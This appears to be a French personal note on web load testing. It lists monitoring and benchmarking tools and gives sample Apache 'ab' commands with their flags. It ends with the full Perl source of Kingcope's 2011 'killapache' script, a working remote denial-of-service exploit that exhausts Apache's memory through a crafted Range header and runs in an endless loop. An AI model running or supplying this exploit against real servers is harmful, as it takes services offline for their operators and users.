Perf test de charge

Liens :

• http://www.thegeekstuff.com/2015/02/jmeter-load-testing/

Outils analyse :

• atop
• sar / sysstat
• tload
• munin

Outils charge :

• jmeters
• ab (apache)
• artillery.io
• gatling
• script perl Apache Killer (Remote DOS Perl Script)
• hey

Autre :

• PhantomJS

Voir aussi :

• Gatling

Voir

• http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/jmeteriser-son-scenario-fonctionnel
• http://blog.milamberspace.net/index.php/jmeter-pages/jmeter-test-de-charges-dun-site-web-mode-demploi/affinage-du-scenario-de-tests
• https://blazemeter.com/blog/5-ways-launch-jmeter-test-without-using-jmeter-gui

Voir aussi :

• siege
• httperf
• pronk

Bloquer les attaques DOS

• https://www.abyssproject.net/2014/06/bloquer-les-attaques-ddos-nginx/

https://www.devside.net/wamp-server/load-testing-apache-with-ab-apache-bench

Exemple :

ab -n 1000 -c 5 http://acme.fr/
ab -r -n 100 -c 10 -k -H "Accept-Encoding: gzip, deflate" http://acme.fr/
ab -n 500 -c 100 -g out.data http://acme.fr/
ab -n 10 -c 5 -A utilisateur:P@ssw0rd http://acme.fr/

-n : nombre de requêtes\ -c : concurence, nombre de requête simultanées\ -k : HTTP KeepAlive\ -e apache.csv : Export les données dans un fihcier CSV\ -r : Ne pas se terminer si erreur sur le socket\ -f : Spécificer le protocol SSL/TLS\ -A : Authentification\ -C : cookie-name=value

Source : http://seclists.org/fulldisclosure/2011/Aug/175

killapache_pl

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
 
use IO::Socket;
use Parallel::ForkManager;
 
sub usage {
	print "Apache Remote Denial of Service (memory exhaustion)\n";
	print "by Kingcope\n";
	print "usage: perl killapache.pl <host> [numforks]\n";
	print "example: perl killapache.pl www.example.com 50\n";
}
 
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
$pm = new Parallel::ForkManager($numforks);
 
$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) {
	$p .= ",5-$k";
}
 
for ($k=0;$k<$numforks;$k++) {
my $pid = $pm->start and next; 	
 
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
while(<$sock>) {
}
 $pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}
 
sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => "80",
                     			 Proto    => 'tcp');
 
$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;
 
$x = <$sock>;
if ($x =~ /Partial/) {
	print "host seems vuln\n";
	return 1;	
} else {
	return 0;	
}
}
 
if ($#ARGV < 0) {
	usage;
	exit;	
}
 
if ($#ARGV > 1) {
	$numforks = $ARGV[1];
} else {$numforks = 50;}
 
$v = testapache();
if ($v == 0) {
	print "Host does not seem vulnerable\n";
	exit;	
}
while(1) {
killapache();
}